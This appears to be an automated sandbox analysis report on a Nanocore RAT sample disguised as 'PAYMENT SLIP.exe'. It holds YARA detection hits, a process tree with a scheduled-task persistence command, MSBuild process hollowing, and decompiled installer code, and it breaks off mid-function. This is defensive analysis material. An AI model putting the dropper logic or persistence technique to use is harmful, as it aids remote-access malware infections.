            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:moderate

            Chronological Activities

            Analysis Process: hmhrpib.exe PID: 6376 Parent PID: 3424

            General

            Start time:15:41:30
            Start date:12/05/2021
            Path:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: schtasks.exe PID: 6508 Parent PID: 6372

            General

            Start time:15:41:31
            Start date:12/05/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'
            Imagebase:0x1390000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: conhost.exe PID: 6608 Parent PID: 6508

            General

            Start time:15:41:32
            Start date:12/05/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff724c50000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: MSBuild.exe PID: 6504 Parent PID: 5704

            General

            Start time:15:41:32
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x120000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: MSBuild.exe PID: 6800 Parent PID: 968

            General

            Start time:15:41:34
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
            Imagebase:0x870000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:moderate

            Chronological Activities

            Analysis Process: conhost.exe PID: 6876 Parent PID: 6800

            General

            Start time:15:41:35
            Start date:12/05/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff724c50000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: MSBuild.exe PID: 6940 Parent PID: 6376

            General

            Start time:15:41:37
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0xa30000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:moderate

            Chronological Activities

            Analysis Process: PAYMENT SLIP.exe PID: 6900 Parent PID: 5704

            General

            Start time:15:41:38
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: MSBuild.exe PID: 6948 Parent PID: 6900

            General

            Start time:15:41:46
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x910000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:moderate

            Chronological Activities

            Disassembly

            Code Analysis

            Reset < >

              Analysis Process: PAYMENT SLIP.exe PID: 6804 Parent PID: 6052 PAYMENT SLIP.exeCOMMON

              Executed Functions

              Function 004035D8, Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 410stringfilecomCOMMON
              Download Yara Rule
              C-Code - Quality: 81%
              			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t62;
				void* _t65;
				void* _t67;
				int _t69;
				int _t71;
				int _t74;
				intOrPtr* _t75;
				int _t76;
				int _t78;
				void* _t102;
				signed int _t119;
				void* _t122;
				void* _t127;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				int _t150;
				void* _t153;
				int _t154;
				signed int _t158;
				signed int _t163;
				signed int _t168;
				void* _t170;
				void* _t172;
				int* _t174;
				signed int _t180;
				signed int _t183;
				CHAR* _t184;
				WCHAR* _t185;
				void* _t191;
				char* _t192;
				void* _t195;
				void* _t196;
				void* _t242;

				_t170 = 0x20;
				_t150 = 0;
				 *(_t196 + 0x14) = 0;
				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t196 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a26c = _t51;
				if(_t51 != 6) {
					_t148 = E00406931(0);
					if(_t148 != 0) {
						 *_t148(0xc00);
					}
				}
				_t184 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t191);
				__imp__OleInitialize(_t150); // executed
				 *0x42a338 = _t56;
				SHGetFileInfoW(0x421708, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
				E0040653C(0x429260, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t192 = L"\"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe\" ";
				E0040653C(_t192, _t60);
				 *0x42a260 = 0x400000;
				_t62 = _t192;
				if(L"\"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe\" " == 0x22) {
					_t62 =  &M00435002;
					_t170 = 0x22;
				}
				_t154 = CharNextW(E00405E3E(_t62, _t170));
				 *(_t196 + 0x18) = _t154;
				_t65 =  *_t154;
				if(_t65 == _t150) {
					L33:
					_t185 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t185);
					_t67 = E004035A7(_t154, 0);
					_t224 = _t67;
					if(_t67 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t69 = E00403068(_t226,  *(_t196 + 0x1c)); // executed
						 *(_t196 + 0x10) = _t69;
						if(_t69 != _t150) {
							L48:
							E00403B19();
							__imp__OleUninitialize();
							_t238 =  *(_t196 + 0x10) - _t150;
							if( *(_t196 + 0x10) == _t150) {
								__eflags =  *0x42a314 - _t150;
								if( *0x42a314 == _t150) {
									L72:
									_t71 =  *0x42a32c;
									__eflags = _t71 - 0xffffffff;
									if(_t71 != 0xffffffff) {
										 *(_t196 + 0x10) = _t71;
									}
									ExitProcess( *(_t196 + 0x10));
								}
								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
								__eflags = _t74;
								if(_t74 != 0) {
									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
									 *(_t196 + 0x34) = 1;
									 *(_t196 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
								}
								_t75 = E00406931(4);
								__eflags = _t75 - _t150;
								if(_t75 == _t150) {
									L70:
									_t76 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t76;
									if(_t76 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
									__eflags = _t78;
									if(_t78 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E00405BA2( *(_t196 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a280 == _t150) {
							L47:
							 *0x42a32c =  *0x42a32c | 0xffffffff;
							 *(_t196 + 0x14) = E00403C0B( *0x42a32c);
							goto L48;
						}
						_t174 = E00405E3E(_t192, _t150);
						if(_t174 < _t192) {
							L44:
							_t235 = _t174 - _t192;
							 *(_t196 + 0x10) = L"Error launching installer";
							if(_t174 < _t192) {
								_t172 = E00405B0D(_t238);
								lstrcatW(_t185, L"~nsu");
								if(_t172 != _t150) {
									lstrcatW(_t185, "A");
								}
								lstrcatW(_t185, L".tmp");
								if(lstrcmpiW(_t185, 0x436800) != 0) {
									_push(_t185);
									if(_t172 == _t150) {
										E00405AF0();
									} else {
										E00405A73();
									}
									SetCurrentDirectoryW(_t185);
									_t242 = L"C:\\Users\\jones\\AppData\\Local\\Temp" - _t150; // 0x43
									if(_t242 == 0) {
										E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", 0x436800);
									}
									E0040653C(0x42b000,  *(_t196 + 0x18));
									_t155 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t195 = 0x1a;
									do {
										E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x120)));
										DeleteFileW(0x420f08);
										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe", 0x420f08, 1) != 0) {
											E00406302(_t155, 0x420f08, _t150);
											E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x124)));
											_t102 = E00405B25(0x420f08);
											if(_t102 != _t150) {
												CloseHandle(_t102);
												 *(_t196 + 0x10) = _t150;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t195 = _t195 - 1;
									} while (_t195 != 0);
									E00406302(_t155, _t185, _t150);
								}
								goto L48;
							}
							 *_t174 = _t150;
							_t175 =  &(_t174[2]);
							if(E00405F19(_t235,  &(_t174[2])) == 0) {
								goto L48;
							}
							E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t175);
							E0040653C(0x436000, _t175);
							 *(_t196 + 0x10) = _t150;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t158 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t119 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t174 != _t158 || _t174[1] != _t119) {
							_t174 = _t174;
							if(_t174 >= _t192) {
								continue;
							}
							break;
						}
						_t150 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t185, 0x3fb);
					lstrcatW(_t185, L"\\Temp");
					_t122 = E004035A7(_t154, _t224);
					_t225 = _t122;
					if(_t122 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t185);
					lstrcatW(_t185, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t185);
					SetEnvironmentVariableW(L"TMP", _t185);
					_t127 = E004035A7(_t154, _t225);
					_t226 = _t127;
					if(_t127 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t153 = 0x20;
						if(_t65 != _t153) {
							L13:
							if( *_t154 == 0x22) {
								_t154 = _t154 + 2;
								_t153 = 0x22;
							}
							if( *_t154 != 0x2f) {
								goto L27;
							} else {
								_t154 = _t154 + 2;
								if( *_t154 == 0x53) {
									_t147 =  *((intOrPtr*)(_t154 + 2));
									if(_t147 == 0x20 || _t147 == 0) {
										 *0x42a320 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t168 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t180 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t168;
								if( *_t154 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t180) {
									_t146 =  *((intOrPtr*)(_t154 + 8));
									if(_t146 == 0x20 || _t146 == 0) {
										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t163 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t183 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t163;
								if( *(_t154 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t183) {
									goto L27;
								} else {
									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
									__eflags = _t154;
									E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
									L32:
									_t150 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t154 = _t154 + 2;
						} while ( *_t154 == _t153);
						goto L13;
						L27:
						_t154 = E00405E3E(_t154, _t153);
						if( *_t154 == 0x22) {
							_t154 = _t154 + 2;
						}
						_t65 =  *_t154;
					} while (_t65 != 0);
					goto L32;
				}
				L4:
				E004068C1(_t184); // executed
				_t184 =  &(_t184[lstrlenA(_t184) + 1]);
				if( *_t184 != 0) {
					goto L4;
				} else {
					E00406931(0xb);
					 *0x42a264 = E00406931(9);
					_t56 = E00406931(7);
					if(_t56 != _t150) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a26f =  *0x42a26f | 0x00000040;
						}
					}
					goto L8;
				}
			}








































              0x004035e3
              0x004035e4
              0x004035eb
              0x004035ef
              0x004035f7
              0x004035fb
              0x00403607
              0x00403610
              0x00403615
              0x00403618
              0x0040361f
              0x00403626
              0x00403626
              0x0040361f
              0x00403628
              0x00403628
              0x00403670
              0x00403671
              0x00403678
              0x0040367e
              0x00403694
              0x004036a4
              0x004036a9
              0x004036af
              0x004036b6
              0x004036c3
              0x004036cd
              0x004036cf
              0x004036d3
              0x004036d8
              0x004036d8
              0x004036e7
              0x004036e9
              0x004036ed
              0x004036f3
              0x0040380a
              0x00403810
              0x0040381b
              0x0040381d
              0x00403822
              0x00403824
              0x0040387c
              0x00403881
              0x0040388b
              0x00403892
              0x00403896
              0x00403947
              0x00403947
              0x0040394c
              0x00403952
              0x00403957
              0x00403a7d
              0x00403a83
              0x00403b01
              0x00403b01
              0x00403b06
              0x00403b09
              0x00403b0b
              0x00403b0b
              0x00403b13
              0x00403b13
              0x00403a93
              0x00403a99
              0x00403a9b
              0x00403aa8
              0x00403abb
              0x00403ac3
              0x00403acb
              0x00403acb
              0x00403ad3
              0x00403ad8
              0x00403adf
              0x00403aed
              0x00403af0
              0x00403af6
              0x00403af8
              0x00000000
              0x00000000
              0x00000000
              0x00403ae1
              0x00403ae7
              0x00403ae9
              0x00403aeb
              0x00403afa
              0x00403afc
              0x00000000
              0x00403afc
              0x00000000
              0x00403aeb
              0x00403adf
              0x00403966
              0x0040396d
              0x0040396d
              0x004038a2
              0x00403937
              0x00403937
              0x00403943
              0x00000000
              0x00403943
              0x004038af
              0x004038b3
              0x00403901
              0x00403901
              0x00403903
              0x0040390b
              0x0040397e
              0x00403980
              0x00403987
              0x0040398f
              0x0040398f
              0x0040399a
              0x004039ae
              0x004039b2
              0x004039b3
              0x004039bc
              0x004039b5
              0x004039b5
              0x004039b5
              0x004039c2
              0x004039c8
              0x004039cf
              0x004039d7
              0x004039d7
              0x004039e5
              0x004039f1
              0x004039ff
              0x00403a04
              0x00403a0a
              0x00403a16
              0x00403a1c
              0x00403a26
              0x00403a3c
              0x00403a4d
              0x00403a53
              0x00403a5a
              0x00403a5d
              0x00403a63
              0x00403a63
              0x00403a5a
              0x00403a67
              0x00403a6e
              0x00403a6e
              0x00403a73
              0x00403a73
              0x00000000
              0x004039ae
              0x0040390d
              0x00403910
              0x0040391b
              0x00000000
              0x00000000
              0x00403923
              0x0040392e
              0x00403933
              0x00000000
              0x00403933
              0x004038bc
              0x004038d4
              0x004038e5
              0x004038e6
              0x004038ea
              0x004038ec
              0x004038fa
              0x004038fd
              0x00000000
              0x00000000
              0x00000000
              0x004038fd
              0x004038ff
              0x00000000
              0x004038ff
              0x0040382c
              0x00403838
              0x0040383d
              0x00403842
              0x00403844
              0x00000000
              0x00000000
              0x0040384c
              0x00403854
              0x00403865
              0x0040386d
              0x0040386f
              0x00403874
              0x00403876
              0x00000000
              0x00000000
              0x00000000
              0x004036f9
              0x004036f9
              0x004036fb
              0x004036ff
              0x00403708
              0x0040370c
              0x00403711
              0x00403712
              0x00403712
              0x00403717
              0x00000000
              0x0040371d
              0x0040371e
              0x00403723
              0x00403725
              0x0040372d
              0x00403734
              0x00403734
              0x0040372d
              0x00403745
              0x00403758
              0x00403759
              0x0040376e
              0x00403773
              0x00403777
              0x00403780
              0x00403788
              0x0040378f
              0x0040378f
              0x00403788
              0x0040379b
              0x004037ae
              0x004037af
              0x004037c4
              0x004037ca
              0x004037ce
              0x00000000
              0x004037f5
              0x004037f5
              0x004037fa
              0x00403803
              0x00403808
              0x00403808
              0x00000000
              0x00403808
              0x004037ce
              0x00000000
              0x00000000
              0x00000000
              0x00403701
              0x00403701
              0x00403702
              0x00403703
              0x00000000
              0x004037d6
              0x004037dd
              0x004037e3
              0x004037e6
              0x004037e6
              0x004037e7
              0x004037ea
              0x00000000
              0x004037f3
              0x0040362d
              0x0040362e
              0x0040363a
              0x00403641
              0x00000000
              0x00403643
              0x00403645
              0x00403653
              0x00403658
              0x0040365f
              0x00403663
              0x00403667
              0x00403669
              0x00403669
              0x00403667
              0x00000000
              0x0040365f

              APIs
              • SetErrorMode.KERNELBASE ref: 004035FB
              • GetVersion.KERNEL32 ref: 00403601
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
              • OleInitialize.OLE32(00000000), ref: 00403678
              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
              • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000020,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000000,?,00000007,00000009,0000000B), ref: 004036E1
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
              • ExitProcess.KERNEL32 ref: 0040396D
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
              • CopyFileW.KERNEL32(C:\Users\user\Desktop\PAYMENT SLIP.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
              • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
              • ExitProcess.KERNEL32 ref: 00403B13
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
              • String ID: "C:\Users\user\Desktop\PAYMENT SLIP.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PAYMENT SLIP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 3441113951-716424415
              • Opcode ID: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
              • Opcode Fuzzy Hash: 8ac029ab22eb7184ad5584a5e27cb41e00d28439acf5d8243c8b0e7e81677052
              • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405C4E, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00405C4E(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F19(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a308 =  *0x42a308 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653C(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E5D(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
